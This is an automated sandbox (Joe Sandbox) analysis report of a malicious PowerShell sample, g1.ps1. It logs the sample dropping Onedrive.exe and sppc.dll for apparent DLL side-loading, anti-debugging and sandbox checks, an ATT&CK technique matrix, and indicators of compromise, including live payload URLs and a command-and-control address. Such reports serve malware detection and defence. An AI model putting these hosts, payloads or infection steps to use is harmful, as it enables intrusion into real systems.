Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A0327470 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,3_2_00007FF8A0327470
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A031B9F0 GetSystemInfo,3_2_00007FF8A031B9F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: powershell.exe, 00000000.00000002.2267385193.0000022F7F3AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWw
Source: powershell.exe, 00000000.00000002.2267385193.0000022F7F3AA000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3901525733.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3137274150.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3604797788.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.4323944839.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000002.4567512777.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Onedrive.exe, 00000003.00000003.3901525733.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3137274150.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3604797788.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.4323944839.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000002.4567512777.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW?
Source: Onedrive.exe, 00000003.00000002.4567512777.0000021BD8D08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A032D650 IsDebuggerPresent,Concurrency::details::UMSBackgroundPoller::~UMSBackgroundPoller,3_2_00007FF8A032D650
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A0301010 CreateFileA,GetFileSize,VirtualAlloc,ReadFile,CloseHandle,LoadLibraryW,GetProcAddress,VirtualFree,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,SleepEx,SleepEx,VirtualFree,CloseHandle,3_2_00007FF8A0301010
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104FD98C GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_00007FF6104FD98C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104FEBD0 SetUnhandledExceptionFilter,3_2_00007FF6104FEBD0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104FE8BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF6104FE8BC
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A0303190 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF8A0303190
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A0302830 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF8A0302830
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A031DC60 __crtCaptureCurrentContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF8A031DC60

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeThread register set: 5036 1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Onedrive.exe "C:\Users\user\AppData\Local\Temp\Onedrive.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A033E310 cpuid 3_2_00007FF8A033E310
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104FEDA4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,3_2_00007FF6104FEDA4
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104F1F10 StrToID,?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z,?AddListener@Element@DirectUI@@QEAAJPEAUIElementListener@2@@Z,3_2_00007FF6104F1F10
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API
1
DLL Side-Loading
111
Process Injection
21
Virtualization/Sandbox Evasion
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
111
Process Injection
LSASS Memory1
Query Registry
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account Manager21
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information
NTDS1
Process Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp
LSA Secrets21
Virtualization/Sandbox Evasion
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials1
Application Window Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync3
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
g1.ps10%ReversingLabs
g1.ps10%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\Onedrive.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\sppc.dll0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://47.84.196.148/0%Avira URL Cloudsafe
https://bangla.b-cdn.net/sppc.dll0%Avira URL Cloudsafe
https://47.84.196.148/V0%Avira URL Cloudsafe
https://47.84.196.148/o0%Avira URL Cloudsafe
http://bangla.b-cdn.net/onedrive.dll0%Avira URL Cloudsafe
http://bangla.b-cdn.net/sppc.dll0%Avira URL Cloudsafe
https://47.84.196.148/reports0%Avira URL Cloudsafe
https://47.84.196.148/reportsX0%Avira URL Cloudsafe
http://bangla.b-cdn.net0%Avira URL Cloudsafe
https://47.84.196.148:443/reports0%Avira URL Cloudsafe
https://47.84.196.148/reportsF0%Avira URL Cloudsafe
https://47.84.196.148/reports=0%Avira URL Cloudsafe
https://47.84.196.148/GZ;~0%Avira URL Cloudsafe
https://bangla.b-cdn.net/onedrive.dll0%Avira URL Cloudsafe
https://bangla.b-cdn.net0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bangla.b-cdn.net
89.35.237.170
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://bangla.b-cdn.net/sppc.dllfalse
    • Avira URL Cloud: safe
    unknown
    https://47.84.196.148/reportstrue
    • Avira URL Cloud: safe
    unknown
    http://bangla.b-cdn.net/onedrive.dllfalse
    • Avira URL Cloud: safe
    unknown
    https://bangla.b-cdn.net/onedrive.dllfalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://47.84.196.148/VOnedrive.exe, 00000003.00000003.2965862283.0000021BD8DBC000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2256795044.0000022F101B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      http://schemas.micOnedrive.exefalse
        high
        https://47.84.196.148/Onedrive.exe, 00000003.00000003.2965862283.0000021BD8DBC000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3604709979.0000021BD8DD3000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2238529101.0000022F00232000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2238529101.0000022F00232000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://go.micropowershell.exe, 00000000.00000002.2238529101.0000022F014D9000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://47.84.196.148/reportsXOnedrive.exe, 00000003.00000003.3136786618.0000021BD8DCA000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.2965471763.0000021BD8DC7000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3137481473.0000021BD8DCD000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.microsoft.copowershell.exe, 00000000.00000002.2266730581.0000022F7F1A0000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://contoso.com/Licensepowershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/Iconpowershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://bangla.b-cdn.netpowershell.exe, 00000000.00000002.2238529101.0000022F0195E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2238529101.0000022F016B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2238529101.0000022F01985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2238529101.0000022F01942000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://47.84.196.148/oOnedrive.exe, 00000003.00000003.2965862283.0000021BD8DBC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://47.84.196.148:443/reportsOnedrive.exe, 00000003.00000002.4567512777.0000021BD8D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2238529101.0000022F00232000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://bangla.b-cdn.net/sppc.dllpowershell.exe, 00000000.00000002.2238529101.0000022F01985000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://47.84.196.148/reports=Onedrive.exe, 00000003.00000002.4567512777.0000021BD8DB0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contoso.com/powershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2256795044.0000022F101B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://47.84.196.148/GZ;~Onedrive.exe, 00000003.00000003.2965862283.0000021BD8DBC000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://47.84.196.148/reportsFOnedrive.exe, 00000003.00000003.4324280737.0000021BD8DAF000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.4323820077.0000021BD8D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://aka.ms/pscore68powershell.exe, 00000000.00000002.2238529101.0000022F00001000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://bangla.b-cdn.netpowershell.exe, 00000000.00000002.2238529101.0000022F01985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2238529101.0000022F01942000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2238529101.0000022F00001000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              89.35.237.170
                              bangla.b-cdn.netRomania
                              34304TEENTELECOMROfalse
                              47.84.196.148
                              unknownUnited States
                              3209VODANETInternationalIP-BackboneofVodafoneDEtrue
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1578250
                              Start date and time:2024-12-19 13:35:08 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 7m 32s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:6
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:g1.ps1
                              Detection:MAL
                              Classification:mal60.evad.winPS1@4/8@1/2
                              EGA Information:
                              • Successful, ratio: 50%
                              HCA Information:
                              • Successful, ratio: 98%
                              • Number of executed functions: 16
                              • Number of non-executed functions: 180
                              Cookbook Comments:
                              • Found application associated with file extension: .ps1
                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target powershell.exe, PID 5324 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              TimeTypeDescription
                              07:36:08API Interceptor43x Sleep call for process: powershell.exe modified
                              07:36:19API Interceptor11514376x Sleep call for process: Onedrive.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              89.35.237.170Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnkGet hashmaliciousUnknownBrowse
                              • bangla.b-cdn.net/sppc.dll
                              47.84.196.148Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                bangla.b-cdn.netScam_Transaction_of_7350_BDT.pdf.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                • 89.35.237.170
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                TEENTELECOMROScam_Transaction_of_7350_BDT.pdf.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                • 89.35.237.170
                                https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                • 89.35.237.170
                                https://sqcconnect.com/editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839fGet hashmaliciousUnknownBrowse
                                • 89.35.237.170
                                http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                • 89.35.237.170
                                http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                • 89.35.237.170
                                https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                • 89.35.237.170
                                https://computeroids.com/hp-printer-driver?utm_source=Google&utm_medium=Click&utm_campaign=HP&utm_term=%7Bkeywords%7D&utm_content=%7Bmedium%7D&tm=tt&ap=gads&aaid=adaHxflMmgPq7&camp_id=12260099411&ad_g_id=118845692873&keyword=install%20hp%20printer%20to%20computer&device=c&network=searchAd&adposition=&gad_source=5&gclid=EAIaIQobChMI0JDUvuabigMV_Uf_AR2MuQCMEAAYASAAEgKQMPD_BwEGet hashmaliciousPureLog StealerBrowse
                                • 89.35.237.170
                                https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                • 89.35.237.170
                                https://ytfjghloadv1.b-cdn.net/proCESSINGveriffv001.htmlGet hashmaliciousCAPTCHA Scam ClickFix, LummaC StealerBrowse
                                • 89.35.237.170
                                https://shorturl.at/aRqLH/Get hashmaliciousUnknownBrowse
                                • 89.35.237.170
                                VODANETInternationalIP-BackboneofVodafoneDEScam_Transaction_of_7350_BDT.pdf.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                • 47.84.196.148
                                mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                • 47.84.100.146
                                arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                • 88.69.110.109
                                mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                • 88.72.154.222
                                mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                • 178.9.13.231
                                la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                • 88.67.178.149
                                la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                • 109.46.80.93
                                la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                • 94.218.243.142
                                loligang.spc.elfGet hashmaliciousMiraiBrowse
                                • 2.205.237.167
                                arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                • 139.7.173.41
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                72a589da586844d7f0818ce684948eeaScam_Transaction_of_7350_BDT.pdf.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                • 47.84.196.148
                                invoice.htmlGet hashmaliciousUnknownBrowse
                                • 47.84.196.148
                                BjLxqVU7m4.dllGet hashmaliciousUnknownBrowse
                                • 47.84.196.148
                                Ne7qNMCeuy.exeGet hashmaliciousUnknownBrowse
                                • 47.84.196.148
                                Q7I4ToJZ0R.exeGet hashmaliciousUnknownBrowse
                                • 47.84.196.148
                                BjLxqVU7m4.dllGet hashmaliciousUnknownBrowse
                                • 47.84.196.148
                                Ne7qNMCeuy.exeGet hashmaliciousUnknownBrowse
                                • 47.84.196.148
                                Q7I4ToJZ0R.exeGet hashmaliciousUnknownBrowse
                                • 47.84.196.148
                                LgigaSKsL6.exeGet hashmaliciousSmokeLoaderBrowse
                                • 47.84.196.148
                                file.exeGet hashmaliciousSmokeLoaderBrowse
                                • 47.84.196.148
                                3b5074b1b5d032e5620f69f9f700ff0eScam_Transaction_of_7350_BDT.pdf.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                • 89.35.237.170
                                LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                • 89.35.237.170
                                YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                • 89.35.237.170
                                raEyjKggAf.ps1Get hashmaliciousUnknownBrowse
                                • 89.35.237.170
                                gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                • 89.35.237.170
                                H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                • 89.35.237.170
                                0iTxQouy7k.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                • 89.35.237.170
                                H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                • 89.35.237.170
                                KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                • 89.35.237.170
                                1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                • 89.35.237.170
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                C:\Users\user\AppData\Local\Temp\sppc.dllScam_Transaction_of_7350_BDT.pdf.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                  C:\Users\user\AppData\Local\Temp\Onedrive.exeScam_Transaction_of_7350_BDT.pdf.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1940658735648508
                                    Encrypted:false
                                    SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                    MD5:DA1F22117B9766A1F0220503765A5BA5
                                    SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                    SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                    SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:@...e.................................R..............@..........
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):110536
                                    Entropy (8bit):6.479810480369939
                                    Encrypted:false
                                    SSDEEP:1536:X35P3jusa9Y8yQ7tCyFvKfD/B1Tu00arKEYdkulZg6nILNnjjtCPd+:HhyvPn3BKfD/BmDd46naIl+
                                    MD5:32C31F06E0B68F349F68AFDD08E45F3D
                                    SHA1:E4B642F887E2C1D76B6B4777ADE91E3CB3B9E27C
                                    SHA-256:CEA83EB34233FED5EBEEF8745C7C581A8ADBEFBCFC0E30E2D30A81000C821017
                                    SHA-512:FE61764B471465B164C9C2202ED349605117D57CEB0ECA75ACF8BDA44E8744C115767EE0CAED0B7FEB70BA37B477D00805B3FDF0D0FA879DD4C8E3C1DC1C0D26
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Joe Sandbox View:
                                    • Filename: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk, Detection: malicious, Browse
                                    Reputation:low
